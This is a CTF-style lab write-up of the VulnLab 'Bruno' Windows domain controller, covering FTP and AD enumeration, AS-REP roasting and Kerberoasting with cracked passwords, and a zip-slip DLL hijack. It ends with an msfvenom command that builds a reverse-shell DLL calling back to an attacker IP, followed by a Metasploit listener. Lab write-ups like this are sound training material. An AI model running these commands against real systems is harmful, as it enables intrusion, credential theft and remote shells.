POSTS

VULNLAB: Bruno

Bruno is a medium-rated Windows domain box that chains insecure application configuration and weak Active Directory hygiene to go from no access to domain admin. The service-facing component is a custom .NET application that extracts ZIP entries unsafely using Path.Combine, allowing crafted archives to perform a zip-slip and place files under the app folder. That capability enables a DLL-search-path hijack - an attacker who can write to the queue share can drop a malicious dll and achieve code execution as the service user. On the network/AD side, an account svc_scan is discoverable and kerberoastable/AS-REP crackable; its recovered credentials grant write access to the queue share, which is used to trigger the DLL payload and get a low-privilege shell. From there the default machine account quota of authenticated users and RBCD are abused to perform a Kerberos relay/RBCD attack that resets the Administrator password and yields full domain compromise.

VULNLAB: Bruno
4251 words · 20 min

Overview

  • Type Machines
  • OS Windows
  • Severity Medium
  • Creator xct
  • Release date 2022 Jul 2

Enumeration

Start the instance via Discord and let’s go:

image

10.10.106.103

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.106.103
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-28 09:56 JST
Nmap scan report for 10.10.106.103
Host is up (0.25s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-29-22  04:55PM       <DIR>          app
| 06-29-22  04:33PM       <DIR>          benign
| 06-29-22  01:41PM       <DIR>          malicious
|_06-29-22  04:33PM       <DIR>          queue
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2025-01-28T00:49:45
|_Not valid after:  2026-01-28T00:49:45
|_ssl-date: 2025-01-28T01:00:40+00:00; -2s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Not valid before: 2022-06-29T13:23:01
|_Not valid after:  2121-06-29T13:33:00
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Not valid before: 2025-01-28T00:49:45
|_Not valid after:  2026-01-28T00:49:45
|_ssl-date: 2025-01-28T01:00:40+00:00; -2s from scanner time.
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BRUNO
|   NetBIOS_Domain_Name: BRUNO
|   NetBIOS_Computer_Name: BRUNODC
|   DNS_Domain_Name: bruno.vl
|   DNS_Computer_Name: brunodc.bruno.vl
|   DNS_Tree_Name: bruno.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-28T01:00:01+00:00
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Not valid before: 2025-01-27T00:47:53
|_Not valid after:  2025-07-29T00:47:53
|_ssl-date: 2025-01-28T01:00:40+00:00; -1s from scanner time.
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BRUNODC; OS: Windows; CPE: cpe:/o:microsoft:windows
  • Seems a domain controller of the domain bruno.vl (even if 88/tcp is not open).
  • Main open ports are for FTP/HTTP/HTTPS server, DNS, LDAP, SMB and also RDP.
  • Add brunodc.bruno.vl, bruno.vl in in /etc/hosts

WEB (80/tcp & 443/tcp)

image

Standard IIS server so ASP should be used too

Check if ADCS is configured:

$ curl https://brunodc.bruno.vl/certsrv -k
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
 </fieldset></div>
</div>
</body>
</html>
$ curl https://brunodc.bruno.vl/certenroll -k
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://brunodc.bruno.vl/certenroll/">here</a></body>

Confirmed, ADCS is configured on this DC

FTP (21/tcp)

Anonymous access is allowed:

$ ftp -i anonymous@brunodc.bruno.vl
Connected to brunodc.bruno.vl.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||59534|)
150 Opening ASCII mode data connection.
06-29-22  04:55PM       <DIR>          app
06-29-22  04:33PM       <DIR>          benign
06-29-22  01:41PM       <DIR>          malicious
06-29-22  04:33PM       <DIR>          queue
226 Transfer complete.

Found 4 folders, because of the names we can see it’s related to an antivirus scanner or something similar.

Try to put a file to any folders but we don’t have WRITE permission.

Let’s download all:

$ wget -r ftp://anonymous:1234@brunodc.bruno.vl/
...
Downloaded: 7 files, 178K in 1.0s (171 KB/s)

Quick enumeration:

$ tree                           
.
└── brunodc.bruno.vl
    ├── app
    │   ├── changelog
    │   ├── SampleScanner.deps.json
    │   ├── SampleScanner.dll
    │   ├── SampleScanner.exe
    │   ├── SampleScanner.runtimeconfig.dev.json
    │   └── SampleScanner.runtimeconfig.json
    ├── benign
    │   └── test.exe
    ├── malicious
    └── queue

In the changelog file we have some interesting info:

$ cat brunodc.bruno.vl/app/changelog         
Version 0.3
- integrated with dev site
- automation using svc_scan

Version 0.2
- additional functionality 

Version 0.1
- initial support for EICAR string
  • That confirmed our 1st idea about an antivirus scanner.
  • A service account svc_scan is used

In the SampleScanner.runtimeconfig.dev.jso file, we found also a user xct:

$ cat brunodc.bruno.vl/app/SampleScanner.runtimeconfig.dev.json 
{
  "runtimeOptions": {
    "additionalProbingPaths": [
      "C:\\Users\\xct\\.dotnet\\store\\|arch|\\|tfm|",
      "C:\\Users\\xct\\.nuget\\packages"
    ]
  }
}

RID Brute-forcing

Try to get the users list using anonymous and guest access but failed:

$ nxc smb brunodc.bruno.vl -u '' -p '' --rid-brute 10000 
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.103   445    BRUNODC          [+] bruno.vl\: 
SMB         10.10.106.103   445    BRUNODC          [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
$ nxc smb brunodc.bruno.vl -u 'guest' -p '' --rid-brute 10000                    
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.103   445    BRUNODC          [-] bruno.vl\guest: STATUS_ACCOUNT_DISABLED 

ASREPRoasting (svc_scan)

Quick check if the service account svc_scan is vulnerable to ASREPRoasting:

$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p '' --asreproast asreproast_output.txt
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        10.10.106.103   445    BRUNODC          $krb5asrep$23$svc_scan@BRUNO.VL:aa2ee2d24772c6df619a18c93777a6de$6c9e311176925b1686d63d19d9f2195041373b309f7ab83054eb44576a37c21218c8a3fffd89ac0a0a4e6daa5c92730545eea2dedec1af6ff7b4e7ea4ddff2f45cd5ef80bb4262530577eadd4209d2ea1dac383ba2356102d95889e2bf3a9aab8a3a9d7524ff6d9365c99600327ae43545da983c97ac375b8d78320cbd56b10b17bb4ffe66d2d41f4eda6cc9414837771a5c3e05c79a4fea3b8e8ae3b7927c4a699b2842ebaad23f29de078cfb42c5ed3757a06562f028a9226c8dfc33fe5413788e4a0a5d3fa533c3156a4c29af3456fe1589fa71c6cb9061e14041b09795c6be52d70d

Vulnerable

Try to crack the hash with Hashcat:

$ hashcat -a 0 -m 18200 svc_scan.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
...
$krb5asrep$23$svc_scan@BRUNO.VL:aa2ee2d24772c6df619a18c93777a6de$6c9e311176925b1686d63d19d9f2195041373b309f7ab83054eb44576a37c21218c8a3fffd89ac0a0a4e6daa5c92730545eea2dedec1af6ff7b4e7ea4ddff2f45cd5ef80bb4262530577eadd4209d2ea1dac383ba2356102d95889e2bf3a9aab8a3a9d7524ff6d9365c99600327ae43545da983c97ac375b8d78320cbd56b10b17bb4ffe66d2d41f4eda6cc9414837771a5c3e05c79a4fea3b8e8ae3b7927c4a699b2842ebaad23f29de078cfb42c5ed3757a06562f028a9226c8dfc33fe5413788e4a0a5d3fa533c3156a4c29af3456fe1589fa71c6cb9061e14041b09795c6be52d70d:Sunshine1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc_scan@BRUNO.VL:aa2ee2d24772c6df619...52d70d

Found svc_scan::Sunshine1

As we have a domain user then let’s enumerate the Active Directory

BloodHound

Let’s go to enumerate the Active Directory then ingest to BloodHound Community Edition for analysis:

$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --bloodhound --dns-server 10.10.106.103 --dns-tcp --dns-timeout 10 --collection All,LoggedOn
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        10.10.106.103   389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
LDAP        10.10.106.103   389    BRUNODC          Resolved collection methods: objectprops, rdp, trusts, group, localadmin, container, dcom, loggedon, psremote, session, acl
LDAP        10.10.106.103   389    BRUNODC          Done in 00M 56S
LDAP        10.10.106.103   389    BRUNODC          Compressing output into /home/user/.nxc/logs/BRUNODC_10.10.106.103_2025-01-28_103827_bloodhound.zip

image

Our pwned svc_scan user has no specific permissions or interesting out object control

image

We can see 2 accounts are kerberoastable:

  • svc_scan already pwned
  • svc_net

But svc_net seems also just a domain users without great interest at this moment:

image

Kerberoasting (svc_net)

Anyway, we try a kerberoasting attack:

$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --kerberoasting kerberoasting_output.txt
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        10.10.106.103   389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
LDAP        10.10.106.103   389    BRUNODC          Bypassing disabled account krbtgt 
LDAP        10.10.106.103   389    BRUNODC          [*] Total of records returned 2
LDAP        10.10.106.103   389    BRUNODC          sAMAccountName: svc_net memberOf:  pwdLastSet: 2022-06-29 22:35:45.023707 lastLogon:2022-06-30 01:29:25.394301
LDAP        10.10.106.103   389    BRUNODC          $krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$18defaa184bafc1c5f8c78473cf652c7$a1ace1dfe9cd5557dcb1d81c27d259ed7685889f99bba2320d3c816bff9c1d43c00f7012140dcd4506a5ac772d93ada97a26807473655877b3cecf7464df46276857a0c46938fce3d2fd4e7c4860ff05a07f5882c59fce41b5482e3808cbef6884f39703f95f66e189751f87cddbcf5927ecc559a96604bc7e574e2d07d8ebb7fdfb3a3fd93f0e4509648f5a440196ce56e649c36d1f3b5c4fb0b2425eacb098dd8f8c5b6dc8a5a4dad1ff029b10e7ffc9c5f4c9321475148be9fe2f5d38fe0d84db2f36e41ac1d00d98668b06049488eeb69d9dad70b3c7efa6e3196ba827567359cacd928e2255054bb7caea226125c1b103e811da45e5a29313e20aa3da7fb857f73e4e0ca3f0687b84696e38bf5d2380a0bea683678200f8fd842c7f4a6e0af506bc157bedfb303743040109521b99f57af8540a48c94d5e0a696809fd08caed071ffee9919806a1a8e47c9bf11c59da456726025fd94e523aaa151fb0d2955c37d37451c55c159135926ee0e7fa2350f3f0c6c67b20246bc91cc13b3b07fd8c06e8c7fcffdbe722e7f10cdb7db36efc358af2818b05f18f869fcad8f168b69fefb72fff6dc472f815e8807ffead699dfc2b538f35b3dc6dfc71360261df121c56fc2ea79d5baf91db1337dde875380770f81d0e21193ba1f5bfc60861c152580da7089a92ceaadd8196ec409508212485620abc4b231dd08be71484321c596afbdf529f4f24fa8413aa6c2be4f07c2a726c92f1cfaf4ad547e69d85f0bb57ca4613062b532a64c642d1479947744fada098a39f6433824ab92d685b237177294b7a318c6483c2c973594c1ab316f4cf0ae4414906506aa577227cfb7ca7f38580c006607b450d9d87912e6f4f2484805131c424d1cbea7daeec861c8bb2cf4d27bdcdf46ad6d9bff6904c97073b9842bbb7eb7c3ff833fe7aebc7fabbf732323558a7a14cc15280eb6708d3a12af301920f6bab468d4cbf8c600e6cb11e43a3d1bffae2d3608646dc490ca848914ee98b77b56e694e2848b2aa5669e99d4a1ebf531aff28bd1b3f0fbb7061bdb03008224c417bc4a8e2787b5ce88222aea6bcd1e2f02781dd493d82fb88d9748760baa52b15836b8b2b14f64497a78c0a5522aece86c6641851935637c7b84ae535fd6ec6e646d713787fea821849c9465dacbd9756c49d357057f1c75ad01955e006152c579ed0f1d8575df686b5d5d28fa978c6d0260277a265a98df1991189007e58e5448b81306c6a3cb0df5acd71a46a92656951aa42027b07053befcafe95f9dc30779d27c08a395530318b3816eb3fe595c5bc51577b16b29c886e083191db1faaad686d79b0c11e85bd62b5ea19491c4838599fa10d887af40d15af1ae3b7f6497ce28cd9bb373073ceb63306f9fdcea887d2e664fe962c8765606225bb
LDAP        10.10.106.103   389    BRUNODC          sAMAccountName: svc_scan memberOf:  pwdLastSet: 2022-06-29 22:36:15.210348 lastLogon:2025-01-28 10:55:53.438873
LDAP        10.10.106.103   389    BRUNODC          $krb5tgs$23$*svc_scan$BRUNO.VL$bruno.vl/svc_scan*$f5642137b570814aa3d8aef96d24120a$09eb77f8d4e9c15b1b09d17ee0000a336d96a0c8fdc0d144fd6cf09d8aca8d45dcfb00928c1f945662f26911149dc4da16f0ffd8f4aec512e76d8d618414f91d3276e54c96ea51528b1e115e3e428c2e43104d873135efa8b27bb32971592ccd8316c870d5be562a25b1c3c2af9af899c76417d9379e81a59c8d9cf5b9f47355808c331b7504b5edba11c9ac2cbc6ccb3273c355e7458329304c9dfd7656700732ef995b4a87daac7ea38d8db3f664e512e25707e1dbf6943c53424a8445168287ef655160854720944e6196f122e96739b6dc73b7c71f8525e4c7384f9e51043008cbc50df94dd3cdf84d929255d3e63d65d598301f770fc7f1f0871700b5184298331b84a6553daa4c74b29e4a3947502401bf69c958bd3a7f2799ff1649bf5f3f657cc583d1bf8b7c3dd57ade5b6daddebc1fd723925b0bb6354f68c5ea0c7d4b7104b730c2e4f150240fd9e025492281d9ab5ac1c1987f3a649ff80085d7fc10e3de48293f9f5ca7aa81ec33b78e6ebfc09f43c8df4c13b1f3671fe0dcff95ad4e6b5599890fe8798c7ee51f18935de46d87c7fddcf078b28cc2daf0a04d9242030d2c65d4f36018d8b98b8ee0d5397739283378b678540800492361786fcc901d4620108c37751f4aa6e3cb6b379186ef4a0aaac3bc6916ee9375dff2829d526ff150c8d0d5b9995b6a33dd764e2286dc35f3fd98bf6bc14fc1f73943b9d377bc58402af8703cd43032a354b78c9795602d1c9a8b23d6b06d1b7561efde9048e81d46f76924fe2bdbb9b05bd72db420057e78e3c34540464e3a32b8eaaa0979f82437147ab10c5b9265a32dc81c6e649bfc3dec98b6a4997d3e95ec704521b03982860f78ce885157412805a5bb2209d1acf5e363f278f4d86cd683344d6156ed7a10940dbceb2d4b2bc4771782a4160b59cc93cbf64dfdfb5fa2b6134727f566e95df07dcb817a9f29a38cc27175582811d7fc1a59aec2da28265806b35c78554dd466b4e4eda8dddce72d373235dbf597fa359ba82c5e012f3fed2d69e7f2f718bc4e6d682a47d72758b35b132517b4f14168c649a59c1272a1f2c382d82272ea861cb4194f17d369976cb4f21657e223c5105478942f4fbf125cd4e23766c3598d9f2fa26b955e6d673ea3d224f88b0370184c11aa1d89425554a94f9b22a514130f80ee05e707a0bb4355300db7047640ad442bed84b85f0260e8f0a84cd9191ed41ecd8007c7707801f029d037a0a0aa713193c678963fb4a4b3d3756801e81bf507ef8022ee9080ba2328fec4aecba3ed4cb60a500b4fec9399b3c4ab727054aa02d735ff6d069a7f96e3c150277b51a6108eca01d5e9a201db7cbe7ed5029f1ae0627b070f412a81a55d3ecf21d89b7b314ea3dc42ee27f44cae0263ed0948a0ecbb00ef8b68809e1f2f28

Then try to crack the hash of svc_net using Hashcat:

$ hashcat -a 0 -m 13100 svc_net.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
...
$krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$18defaa184bafc1c5f8c78473cf652c7$a1ace1dfe9cd5557dcb1d81c27d259ed7685889f99bba2320d3c816bff9c1d43c00f7012140dcd4506a5ac772d93ada97a26807473655877b3cecf7464df46276857a0c46938fce3d2fd4e7c4860ff05a07f5882c59fce41b5482e3808cbef6884f39703f95f66e189751f87cddbcf5927ecc559a96604bc7e574e2d07d8ebb7fdfb3a3fd93f0e4509648f5a440196ce56e649c36d1f3b5c4fb0b2425eacb098dd8f8c5b6dc8a5a4dad1ff029b10e7ffc9c5f4c9321475148be9fe2f5d38fe0d84db2f36e41ac1d00d98668b06049488eeb69d9dad70b3c7efa6e3196ba827567359cacd928e2255054bb7caea226125c1b103e811da45e5a29313e20aa3da7fb857f73e4e0ca3f0687b84696e38bf5d2380a0bea683678200f8fd842c7f4a6e0af506bc157bedfb303743040109521b99f57af8540a48c94d5e0a696809fd08caed071ffee9919806a1a8e47c9bf11c59da456726025fd94e523aaa151fb0d2955c37d37451c55c159135926ee0e7fa2350f3f0c6c67b20246bc91cc13b3b07fd8c06e8c7fcffdbe722e7f10cdb7db36efc358af2818b05f18f869fcad8f168b69fefb72fff6dc472f815e8807ffead699dfc2b538f35b3dc6dfc71360261df121c56fc2ea79d5baf91db1337dde875380770f81d0e21193ba1f5bfc60861c152580da7089a92ceaadd8196ec409508212485620abc4b231dd08be71484321c596afbdf529f4f24fa8413aa6c2be4f07c2a726c92f1cfaf4ad547e69d85f0bb57ca4613062b532a64c642d1479947744fada098a39f6433824ab92d685b237177294b7a318c6483c2c973594c1ab316f4cf0ae4414906506aa577227cfb7ca7f38580c006607b450d9d87912e6f4f2484805131c424d1cbea7daeec861c8bb2cf4d27bdcdf46ad6d9bff6904c97073b9842bbb7eb7c3ff833fe7aebc7fabbf732323558a7a14cc15280eb6708d3a12af301920f6bab468d4cbf8c600e6cb11e43a3d1bffae2d3608646dc490ca848914ee98b77b56e694e2848b2aa5669e99d4a1ebf531aff28bd1b3f0fbb7061bdb03008224c417bc4a8e2787b5ce88222aea6bcd1e2f02781dd493d82fb88d9748760baa52b15836b8b2b14f64497a78c0a5522aece86c6641851935637c7b84ae535fd6ec6e646d713787fea821849c9465dacbd9756c49d357057f1c75ad01955e006152c579ed0f1d8575df686b5d5d28fa978c6d0260277a265a98df1991189007e58e5448b81306c6a3cb0df5acd71a46a92656951aa42027b07053befcafe95f9dc30779d27c08a395530318b3816eb3fe595c5bc51577b16b29c886e083191db1faaad686d79b0c11e85bd62b5ea19491c4838599fa10d887af40d15af1ae3b7f6497ce28cd9bb373073ceb63306f9fdcea887d2e664fe962c8765606225bb:Sunshine1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$18d...6225bb

Found svc_net:Sunshine1 (same password than svc_scan)

RID Brute-forcing

We proceed to another try as we have now a domain user account, even if not helpful now, that can be use for any bruteforce attack in future:

$ nxc smb brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --rid-brute 10000                       
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.103   445    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
SMB         10.10.106.103   445    BRUNODC          498: BRUNO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          500: BRUNO\Administrator (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          501: BRUNO\Guest (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          502: BRUNO\krbtgt (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          512: BRUNO\Domain Admins (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          513: BRUNO\Domain Users (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          514: BRUNO\Domain Guests (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          515: BRUNO\Domain Computers (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          516: BRUNO\Domain Controllers (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          517: BRUNO\Cert Publishers (SidTypeAlias)
SMB         10.10.106.103   445    BRUNODC          518: BRUNO\Schema Admins (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          519: BRUNO\Enterprise Admins (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          520: BRUNO\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          521: BRUNO\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          522: BRUNO\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          525: BRUNO\Protected Users (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          526: BRUNO\Key Admins (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          527: BRUNO\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          553: BRUNO\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.106.103   445    BRUNODC          571: BRUNO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.106.103   445    BRUNODC          572: BRUNO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.106.103   445    BRUNODC          1000: BRUNO\BRUNODC$ (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1101: BRUNO\DnsAdmins (SidTypeAlias)
SMB         10.10.106.103   445    BRUNODC          1102: BRUNO\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          1103: BRUNO\svc_net (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1104: BRUNO\svc_scan (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1105: BRUNO\employees (SidTypeGroup)
SMB         10.10.106.103   445    BRUNODC          1106: BRUNO\Chloe.Ball (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1107: BRUNO\Kayleigh.Patel (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1108: BRUNO\Donna.Harrison (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1109: BRUNO\Charles.Young (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1110: BRUNO\Graeme.Grant (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1111: BRUNO\Natalie.Anderson (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1112: BRUNO\Sam.Owen (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1113: BRUNO\Jeremy.Singh (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1114: BRUNO\Kieran.Day (SidTypeUser)
SMB         10.10.106.103   445    BRUNODC          1115: BRUNO\Hugh.Young (SidTypeUser)

Let’s copy/paste the output to a file then get just the users and put them in a new wordlist file:

$ cat all_sids.txt | grep TypeUser | awk '{ print $6}' | cut -d '\' -f 2 > all_users.txt
$ cat all_users.txt                                                                     
Administrator
Guest
krbtgt
BRUNODC$
svc_net
svc_scan
Chloe.Ball
Kayleigh.Patel
Donna.Harrison
Charles.Young
Graeme.Grant
Natalie.Anderson
Sam.Owen
Jeremy.Singh
Kieran.Day
Hugh.Young

We are proceeded a password spray attack against all users but without result.

SMB (445/tcp)

Let’s dig to SMB shares:

$ nxc smb brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --shares
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.103   445    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
SMB         10.10.106.103   445    BRUNODC          [*] Enumerated shares
SMB         10.10.106.103   445    BRUNODC          Share           Permissions     Remark
SMB         10.10.106.103   445    BRUNODC          -----           -----------     ------
SMB         10.10.106.103   445    BRUNODC          ADMIN$                          Remote Admin
SMB         10.10.106.103   445    BRUNODC          C$                              Default share
SMB         10.10.106.103   445    BRUNODC          CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.106.103   445    BRUNODC          IPC$            READ            Remote IPC
SMB         10.10.106.103   445    BRUNODC          NETLOGON        READ            Logon server share 
SMB         10.10.106.103   445    BRUNODC          queue           READ,WRITE      
SMB         10.10.106.103   445    BRUNODC          SYSVOL          READ            Logon server share 

We have a READ/WRITE access to the folder queue that is interesting because it’s used on the FTP server too.

As we don`t have much more enumeration then step back to the files we have downloaded previously, included the binary of the scanner.

SampleScanner Reverse Engineering

$ file brunodc.bruno.vl/app/SampleScanner.exe 
brunodc.bruno.vl/app/SampleScanner.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections

$ file brunodc.bruno.vl/app/SampleScanner.dll
brunodc.bruno.vl/app/SampleScanner.dll: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows, 2 sections

Now it’s time to reverse engineer the SampleScanner.exe application to see if we could perform any DLL Hijacking.

This app is written in .NET so we can open the SampleScanner.exe with dnSpy and investigate:

image

image

The app is looking for .zip files in the queue folder, extract these file and then copy the file to another folder.

There is a common vulnerability in ZIP files, with 7zip we can edit a zip file and change the name of the files to include some path traversal ../../ so we are able to write to any location of the C: directory who the user has permissions to.

DLL Hijacking via ZipSlip

ZipSlip is essentially a vulnerability that allows us to perform file creation via path traversal in a zip archive. If a zip archive is opened automatically by a program, we can create a compressed archive with a file that has path traversal characters in its name, such as ../revshell.exe. This will place our executable in the parent folder of where it was opened.

In our case, we want to place a malicious executable in ../app/(malicious_file_here). This should be within the same path as the binary, which is where the application is trying to load DLLs from.

Since we know the names of the DLL that are not found within the application’s direct path, we can use those as the names for our malicious DLLs. We can craft a malicious DLL using msfvenom, as seen below and then convert it to a zip archive.

Investigation

Let’s first start by opening ProcMon via the Microsoft SysInternalsSuite.

We create the same structure with C:\samples\queue\ folders and put inside a test.txt and compressed test.zip files:

image

We also create C:\samples\app\ and put inside all file related to the SampleScanner:

image

Launch Procmon64.exe.

Navigate to Filter > Filter (or just Ctrl+L), and use the configuration as seen below:

  • Process Name - begins with - SampleScanner -> then Include
  • Path - ends with - .dll -> then Include
  • Result - is - NAME NOT FOUND -> then Include

image

Then we launch SampleScanner.exe and we can see the output below:

image

We found that hostfxr.dll is called by the app but not found then we can abuse this one

Exploitation (Bruno_User)

Create our malicious dll using Metasploit and naming ‘hostfxr.dll’:

$ msfvenom -p windows/x64/shell_reverse_tcp -ax64 LHOST=10.8.4.253 LPORT=443 -f dll -o hostfxr.dll 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: hostfxr.dll

Set our Meterpreter listener:

$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/shell_reverse_tcp; set LHOST tun0; set LPORT 443; set ExitOnSession false; exploit -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
LHOST => tun0
LPORT => 443
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.8.4.253:443 
msf6 exploit(multi/handler) > 

